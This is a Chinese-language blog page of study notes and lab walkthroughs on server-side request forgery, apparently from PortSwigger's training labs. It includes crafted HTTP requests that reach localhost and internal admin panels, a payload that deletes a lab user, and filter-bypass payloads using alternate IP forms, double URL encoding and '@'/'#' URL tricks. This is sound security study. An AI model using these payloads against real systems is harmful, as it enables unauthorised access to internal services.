<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="服务端请求伪造">
<meta property="og:type" content="article">
<meta property="og:title" content="Server-side request forgery (SSRF)">
<meta property="og:url" content="https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/index.html">
<meta property="og:site_name" content="人生边上">
<meta property="og:description" content="服务端请求伪造">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403201710714.png">
<meta property="og:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403201736875.png">
<meta property="article:published_time" content="2024-03-19T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-22T08:32:36.501Z">
<meta property="article:author" content="Yijian">
<meta property="article:tag" content="知识&#x2F;cybersecurity">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="SSRF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403201710714.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Server-side request forgery (SSRF)</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/91Quin">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/Notes/Web%20cache%20poisoning/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/Notes/File%20upload%20vulnerabilities/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&text=Server-side request forgery (SSRF)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&is_video=false&description=Server-side request forgery (SSRF)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Server-side request forgery (SSRF)&body=Check out this article: https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&title=Server-side request forgery (SSRF)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&name=Server-side request forgery (SSRF)&description=&lt;p&gt;服务端请求伪造&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://zhangyijian.cn/Notes/Server-side%20request%20forgery%20(SSRF)/&t=Server-side request forgery (SSRF)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-SSRF"><span class="toc-number">1.</span> <span class="toc-text">What is SSRF?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-the-impact-of-SSRF-attacks"><span class="toc-number">2.</span> <span class="toc-text">What is the impact of SSRF attacks?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Common-SSRF-attacks"><span class="toc-number">3.</span> <span class="toc-text">Common SSRF attacks</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-attacks-against-the-server"><span class="toc-number">3.1.</span> <span class="toc-text">SSRF attacks against the server</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Basic-SSRF-against-the-local-server"><span class="toc-number">3.1.1.</span> <span class="toc-text">Lab: Basic SSRF against the local server</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-attacks-against-other-back-end-systems"><span class="toc-number">3.2.</span> <span class="toc-text">SSRF attacks against other back-end systems</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Basic-SSRF-against-another-back-end-system"><span class="toc-number">3.2.1.</span> <span class="toc-text">Lab: Basic SSRF against another back-end system</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Circumventing-common-SSRF-defenses"><span class="toc-number">4.</span> <span class="toc-text">Circumventing common SSRF defenses</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-with-blacklist-based-input-filters"><span class="toc-number">4.1.</span> <span class="toc-text">SSRF with blacklist-based input filters</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-blacklist-based-input-filter"><span class="toc-number">4.1.1.</span> <span class="toc-text">Lab: SSRF with blacklist-based input filter</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-with-whitelist-based-input-filters"><span class="toc-number">4.2.</span> <span class="toc-text">SSRF with whitelist-based input filters</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-whitelist-based-input-filter"><span class="toc-number">4.2.1.</span> <span class="toc-text">Lab: SSRF with whitelist-based input filter</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypassing-SSRF-filters-via-open-redirection"><span class="toc-number">4.3.</span> <span class="toc-text">Bypassing SSRF filters via open redirection</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-SSRF-with-filter-bypass-via-open-redirection-vulnerability"><span class="toc-number">4.3.1.</span> <span class="toc-text">Lab: SSRF with filter bypass via open redirection vulnerability</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Blind-SSRF-vulnerabilities"><span class="toc-number">5.</span> <span class="toc-text">Blind SSRF vulnerabilities</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Finding-hidden-attack-surface-for-SSRF-vulnerabilities"><span class="toc-number">6.</span> <span class="toc-text">Finding hidden attack surface for SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Partial-URLs-in-requests"><span class="toc-number">6.1.</span> <span class="toc-text">Partial URLs in requests</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#URLs-within-data-formats"><span class="toc-number">6.2.</span> <span class="toc-text">URLs within data formats</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSRF-via-the-Referer-header"><span class="toc-number">6.3.</span> <span class="toc-text">SSRF via the Referer header</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Blind-SSRF-vulnerabilities-1"><span class="toc-number"></span> <span class="toc-text">Blind SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-blind-SSRF"><span class="toc-number">1.</span> <span class="toc-text">What is blind SSRF?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#What-is-the-impact-of-blind-SSRF-vulnerabilities"><span class="toc-number">2.</span> <span class="toc-text">What is the impact of blind SSRF vulnerabilities?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#How-to-find-and-exploit-blind-SSRF-vulnerabilities"><span class="toc-number">3.</span> <span class="toc-text">How to find and exploit blind SSRF vulnerabilities</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Blind-SSRF-with-out-of-band-detection"><span class="toc-number">3.0.1.</span> <span class="toc-text">Lab: Blind SSRF with out-of-band detection</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Lab-Blind-SSRF-with-Shellshock-exploitation"><span class="toc-number">3.0.2.</span> <span class="toc-text">Lab: Blind SSRF with Shellshock exploitation</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Server-side request forgery (SSRF)
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Yijian</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-03-19T16:00:00.000Z" class="dt-published" itemprop="datePublished">2024-03-20</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/SSRF/" rel="tag">SSRF</a>, <a class="p-category" href="/tags/Web/" rel="tag">Web</a>, <a class="p-category" href="/tags/%E7%9F%A5%E8%AF%86-cybersecurity/" rel="tag">知识/cybersecurity</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>服务端请求伪造</p>
<span id="more"></span>
<h2 id="What-is-SSRF"><a href="#What-is-SSRF" class="headerlink" title="What is SSRF?"></a>What is SSRF?</h2><blockquote>
<p>SSRF ” allows an attacker to cause the server-side application to make requests to an unintended location.“</p>
</blockquote>
<p>通常情况下，是向内部的服务。严重的情况下，可能说是请求外部的任意系统，这就会泄露敏感信息。</p>
<h2 id="What-is-the-impact-of-SSRF-attacks"><a href="#What-is-the-impact-of-SSRF-attacks" class="headerlink" title="What is the impact of SSRF attacks?"></a>What is the impact of SSRF attacks?</h2><p>通常会导致”unauthorized actions or access to data within the organization“ ， 有些情况下，可能会使攻击者能够执行任意代码。</p>
<blockquote>
<p>“An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks.”</p>
</blockquote>
<blockquote>
<p>An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks. these can appear to originate from the organization hosting the vulnerable application.</p>
</blockquote>
<p>我的理解是，存在SSRF漏洞的服务器会被利用，用于进一步的攻击，像DDoS等等。会被当成肉鸡（？</p>
<h2 id="Common-SSRF-attacks"><a href="#Common-SSRF-attacks" class="headerlink" title="Common SSRF attacks"></a>Common SSRF attacks</h2><p>SSRF通常是利用“可信关系”来发起攻击的。</p>
<h3 id="SSRF-attacks-against-the-server"><a href="#SSRF-attacks-against-the-server" class="headerlink" title="SSRF attacks against the server"></a>SSRF attacks against the server</h3><p>这里举出SSRF的一种攻击类型是通过，使应用自己给自己发请求，来实现的。“via its loopback network interface” ， 比方说提交的URL改成<code>127.0.0.1</code>或者<code>localhost</code>。</p>
<p>这里它举了个例子，说会查询库存数量。</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/product/stock</span> <span class="meta">HTTP/1.0</span></span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>118</span><br><span class="line"></span><br><span class="line"><span class="language-apache"><span class="attribute">stockApi</span>=http://stock.weliketoshop.net:<span class="number">8080</span>/product/stock/check%<span class="number">3</span>FproductId%<span class="number">3</span>D6%<span class="number">26</span>storeId%<span class="number">3</span>D1</span></span><br></pre></td></tr></table></figure>
<p>这种时候，就可以指定个URL来实现SSRF攻击。</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/product/stock</span> <span class="meta">HTTP/1.0</span></span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>118</span><br><span class="line"></span><br><span class="line"><span class="language-awk">stockApi=http:<span class="regexp">//</span>localhost/admin</span></span><br></pre></td></tr></table></figure>
<p>此时，就泄露敏感数据了。因为攻击者正常情况下，是没办法访问<code>/admin</code>的，而此时是server本身发的请求，因此是<strong>可信</strong>的，所以会被接受。“the request appears to originate from a trusted location.”</p>
<p>为什么会信任来自本地的请求，可能有以下几种原因：</p>
<ul>
<li><code>access control check</code>可能跟server分开的，是server前边的另一个构件。所以自己给自己发送请求，这个check就被绕过了。</li>
<li>“For disaster recovery purposes”，可能说管理员密码忘了，登陆凭证丢了，就可以通过这种方式恢复系统。</li>
<li>管理界面跟main application不在一个端口，用户接触不到。（所以就放松警惕了？）<br>这种情况的漏洞，往往比较严重。</li>
</ul>
<h4 id="Lab-Basic-SSRF-against-the-local-server"><a href="#Lab-Basic-SSRF-against-the-local-server" class="headerlink" title="Lab: Basic SSRF against the local server"></a>Lab: Basic SSRF against the local server</h4><p>这里随便点进去一个商品页面可以看到有<code>Check stock</code>的交互。request 如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/product/stock</span> <span class="meta">HTTP/2</span></span><br><span class="line"></span><br><span class="line"><span class="language-apache"><span class="attribute">Host</span>: <span class="number">0</span>aa5000003a7903d81cf529b00fa002f.web-security-academy.net</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Cookie</span>: session=<span class="number">1</span>TynsLvHlBR61qo4HmJHeXvl2xR8PA4G</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Content</span>-Length: <span class="number">107</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Ch-Ua: <span class="string">&quot;Chromium&quot;</span>;v=<span class="string">&quot;122&quot;</span>, <span class="string">&quot;Not(A:Brand&quot;</span>;v=<span class="string">&quot;24&quot;</span>, <span class="string">&quot;Google Chrome&quot;</span>;v=<span class="string">&quot;122&quot;</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Ch-Ua-Platform: <span class="string">&quot;Linux&quot;</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Ch-Ua-Mobile: ?<span class="number">0</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">User</span>-Agent: Mozilla/<span class="number">5</span>.<span class="number">0</span> (X11; Linux x86_64) AppleWebKit/<span class="number">537</span>.<span class="number">36</span> (KHTML, like Gecko) Chrome/<span class="number">122.0.0.0</span> Safari/<span class="number">537</span>.<span class="number">36</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Content</span>-Type: application/x-www-form-urlencoded</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Accept</span>: */*</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Origin</span>: https://<span class="number">0</span>aa5000003a7903d81cf529b00fa002f.web-security-academy.net</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Fetch-Site: same-origin</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Fetch-Mode: cors</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Sec</span>-Fetch-Dest: empty</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Referer</span>: https://<span class="number">0</span>aa5000003a7903d81cf529b00fa002f.web-security-academy.net/product?productId=<span class="number">3</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Accept</span>-Encoding: gzip, deflate</span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">Accept</span>-Language: zh-CN,zh;q=<span class="number">0</span>.<span class="number">9</span></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"></span></span><br><span class="line"><span class="language-apache"><span class="attribute">stockApi</span>=http%<span class="number">3</span>A%<span class="number">2</span>F%<span class="number">2</span>Fstock.weliketoshop.net%<span class="number">3</span>A8080%<span class="number">2</span>Fproduct%<span class="number">2</span>Fstock%<span class="number">2</span>Fcheck%<span class="number">3</span>FproductId%<span class="number">3</span>D3%<span class="number">26</span>storeId%<span class="number">3</span>D1</span></span><br></pre></td></tr></table></figure>
<p>这里修改<code>stockApi</code>为</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stockApi=http%3a%2f%2flocalhost%2fadmin</span><br></pre></td></tr></table></figure>
<p>然后发现页面出现管理后台<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403201710714.png"><br><del>删除<code>carlos</code>即可</del>，注意还是要利用<code>loopback</code>实现删除操作。这里删除使用的<code>GET</code>方法，故将<code>stockApi</code>修改为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos</span><br></pre></td></tr></table></figure>
<p>即可完成lab</p>
<h3 id="SSRF-attacks-against-other-back-end-systems"><a href="#SSRF-attacks-against-other-back-end-systems" class="headerlink" title="SSRF attacks against other back-end systems"></a>SSRF attacks against other back-end systems</h3><p>这种类型与上述类型大致相同，只不过对象从<code>localhost</code>变成了后端的系统。</p>
<p>有些情况下，server可以与一些后端系统交互，用户就不可以。这些系统通常IP是不可路由的(non-routable)，由网络拓扑来防护，防护较弱。而且，往往有些敏感功能。</p>
<p>举例：管理界面在后端<code>https://192.168.0.68/admin</code>。攻击者就可以使用SSRF漏洞，使用管理界面。</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/product/stock</span> <span class="meta">HTTP/1.0</span></span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>118</span><br><span class="line"></span><br><span class="line"><span class="language-awk">stockApi=http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">0.68</span>/admin</span></span><br></pre></td></tr></table></figure>
<h4 id="Lab-Basic-SSRF-against-another-back-end-system"><a href="#Lab-Basic-SSRF-against-another-back-end-system" class="headerlink" title="Lab: Basic SSRF against another back-end system"></a>Lab: Basic <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf">SSRF</a> against another back-end system</h4><p>这里给出了<code>192.168.0.X</code>，一个范围，需要我们自己去扫描，emmm，它要介绍burp suite的什么功能是吗？</p>
<p>是的，不出所料。介绍了<code>Burp Intruder</code>可以设置其中的参数，然后设置范围，然后发送数据包。</p>
<ol>
<li>先将修改后的request送去<code>Intruder</code>，<img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403201736875.png">这里选中<code>1</code>，<code>Add $</code></li>
<li>切换到<code>Payloads</code>标签页，将<code>Payload type</code>切换到<code>Numbers</code>，<code>From</code>1<code>To</code>255，<code>step</code>&#x3D;1</li>
<li>然后开始<code>start attack</code>，根据状态码排序可以很方便的看到管理后台在247</li>
<li>在截获个数据包可以看到<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/http://192.168.0.247:8080/admin/delete?username=carlos</span> <span class="meta">HTTP/2</span></span><br></pre></td></tr></table></figure></li>
<li>因此可以修改<code>stockApi=http%3a%2f%2f192.168.0.247%3a8080%2fadmin%2fdelete%3fusername%3dcarlos</code>即可完成。</li>
</ol>
<h2 id="Circumventing-common-SSRF-defenses"><a href="#Circumventing-common-SSRF-defenses" class="headerlink" title="Circumventing common SSRF defenses"></a>Circumventing common SSRF defenses</h2><p>circumvent verb. 规避（为什么不用bypass了？</p>
<h3 id="SSRF-with-blacklist-based-input-filters"><a href="#SSRF-with-blacklist-based-input-filters" class="headerlink" title="SSRF with blacklist-based input filters"></a>SSRF with blacklist-based input filters</h3><p>一些应用程序会限制输入，像常见的<code>127.0.0.1</code>和<code>localhost</code>，或者敏感的URL，像之前的<code>/admin</code>。这种情况下，可以使用一些技巧来规避：</p>
<ul>
<li>使用<code>127.0.0.1</code>的替代表达，<code>2130706433</code> , <code>017700000001</code> or <code>127.1</code></li>
<li>注册自己的域名，解析到<code>127.0.0.1</code></li>
<li>利用URL编码或是大小写变化，来混淆字符串。</li>
<li>提供一个URL重定向到目标URL。可以尝试用不同的协议。像<code>https</code>with <code>http</code></li>
</ul>
<h4 id="Lab-SSRF-with-blacklist-based-input-filter"><a href="#Lab-SSRF-with-blacklist-based-input-filter" class="headerlink" title="Lab: SSRF with blacklist-based input filter"></a>Lab: SSRF with blacklist-based input filter</h4><blockquote>
<p>The developer has deployed two weak anti-SSRF defenses that you will need to bypass.</p>
</blockquote>
<ol>
<li>尝试了<code>/127.1/admin</code>,不行</li>
<li><code>stockApi=http%3a%2f%2f2130706433%2fadmin</code> ,blocked , <code>https</code> has been blocked too</li>
<li><code>stockApi=%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%2f%61%64%6d%69%6e</code> 也不行</li>
<li>看了题解，将<code>admin</code>中<code>a</code>进行两次url编码就可以绕过。</li>
<li>我最后使用<code>127.1/admin</code>，其中<code>n</code>进行了两次url编码来绕过。</li>
<li>显示管理面板后，截获数据包<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/admin/delete?username=carlos</span> <span class="meta">HTTP/2</span></span><br></pre></td></tr></table></figure></li>
<li>像之前一样发送数据包即可完成。</li>
</ol>
<h3 id="SSRF-with-whitelist-based-input-filters"><a href="#SSRF-with-whitelist-based-input-filters" class="headerlink" title="SSRF with whitelist-based input filters"></a>SSRF with whitelist-based input filters</h3><blockquote>
<p>You may be able to bypass this filter by exploiting inconsistencies in URL parsing.</p>
</blockquote>
<ul>
<li>可以用<code>@</code>把credentials插入到hostname前边<br><code>https://expected-host:fakepassword@evil-host</code></li>
<li>可以用<code>#</code>指明URL分片（？<br><code>https://evil-host#expected-host</code></li>
<li>可以利用DNS域名分级（根，顶级，一级那个），来把要求的输入放入可控的，验证过的，DNS域名（？<br><code>https://expected-host.evil-host</code></li>
<li>可以使用URL编码来混淆。特别是过滤的实现和发送后端请求的实现不大一样时。也可以使用<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings#obfuscation-via-double-url-encoding">double-encoding</a><blockquote>
<p>[[Essential skills]]</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/blog/top-10-web-hacking-techniques-of-2017#1">A new era of SSRF</a></li>
</ul>
</blockquote>
</li>
</ul>
<h4 id="Lab-SSRF-with-whitelist-based-input-filter"><a href="#Lab-SSRF-with-whitelist-based-input-filter" class="headerlink" title="Lab: SSRF with whitelist-based input filter"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/ssrf">SSRF</a> with whitelist-based input filter</h4><ol>
<li>尝试<code>127.1/admin</code>并进行double encode，不成功</li>
<li>看到response<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">HTTP/2</span> <span class="number">400</span> Bad Request</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/json; charset=utf-8</span><br><span class="line"><span class="attribute">X-Frame-Options</span><span class="punctuation">: </span>SAMEORIGIN</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>58</span><br><span class="line"></span><br><span class="line"><span class="language-smalltalk"><span class="comment">&quot;External stock check host must be stock.weliketoshop.net&quot;</span></span></span><br></pre></td></tr></table></figure></li>
<li>看了solution，最终是使用<code>@</code>插入，并使用<code>#</code>来分片，同时需要对<code>#</code>进行double-URL encode</li>
<li>这里判断能使用<code>@</code>，URL支持embedded credentials.是通过发送URL<code>http://username@stock.weliketoshop.net/</code></li>
<li><code>stockApi=http%3a//localhost%3a80%2523%40stock.weliketoshop.net/admin/delete%3fusername%3dcarlos</code></li>
</ol>
